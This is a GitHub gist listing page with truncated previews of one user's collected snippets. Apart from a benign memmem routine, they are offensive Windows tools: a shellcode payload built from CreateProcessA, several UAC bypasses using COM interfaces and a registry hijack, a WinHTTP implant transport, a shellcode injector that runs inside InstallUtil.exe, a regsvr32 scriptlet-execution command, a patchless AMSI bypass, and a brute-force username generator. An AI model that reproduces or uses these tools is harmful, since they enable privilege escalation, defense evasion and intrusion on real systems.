Skip to content

Instantly share code, notes, and snippets.

@Yeah9782
Yeah9782 / memmem.md
Created June 12, 2022 23:44 — forked from alexx384/memmem.md
Custom implementation of memmem() for Windows and others

The implementation based on the StackExchange question and answers. Also added some improvements.

#include <stdlib.h>

void* memmem(const void* haystack, size_t haystackLen,
             const void* needle, size_t needleLen)
{
	/* The first occurrence of the empty string is deemed to occur at
@Yeah9782
Yeah9782 / shellcode_createprocess.c
Created July 11, 2022 21:26
CreateProcessA C payload converted into a shellcode payload with the help of http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
#define WIN32_LEAN_AND_MEAN
#pragma warning( disable : 4201 )
#include "GetProcAddressWithHash.h"
#include <windows.h>
#include <intrin.h>
typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
typedef BOOL(WINAPI * CREATEPROCESSA)(LPCTSTR, LPCTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
@Yeah9782
Yeah9782 / akagi_58a.c
Created July 11, 2022 21:32 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@Yeah9782
Yeah9782 / akagi_41.c
Created July 11, 2022 21:33 — forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@Yeah9782
Yeah9782 / akagi_42b.c
Created July 11, 2022 21:33 — forked from hfiref0x/akagi_42b.c
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@Yeah9782
Yeah9782 / transport_https.c
Created July 24, 2022 18:15 — forked from Cracked5pider/transport_https.c
perform HTTPs requests using WinHTTP
BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize )
{
#ifdef TRANSPORT_HTTP
HANDLE hConnect = NULL;
HANDLE hSession = NULL;
HANDLE hRequest = NULL;
DWORD HttpFlags = 0;
LPVOID RespBuffer = NULL;
@Yeah9782
Yeah9782 / rwxHunter.cs
Created August 14, 2022 23:12 — forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@Yeah9782
Yeah9782 / example.sct
Created August 14, 2022 23:12 — forked from nicholasmckinney/example.sct
SCT File Obfuscation Examples:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
@Yeah9782
Yeah9782 / patchless_amsi.h
Created August 19, 2022 16:26 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@Yeah9782
Yeah9782 / namemash.py
Created June 1, 2023 12:46 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''